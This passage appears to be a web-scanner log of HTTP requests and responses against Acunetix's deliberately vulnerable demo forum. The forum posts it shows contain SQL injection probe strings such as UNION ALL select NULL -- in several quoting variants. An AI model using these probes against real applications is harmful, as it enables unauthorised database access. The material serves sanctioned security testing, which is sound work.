<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4132 |
| Response Body - size: 4,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
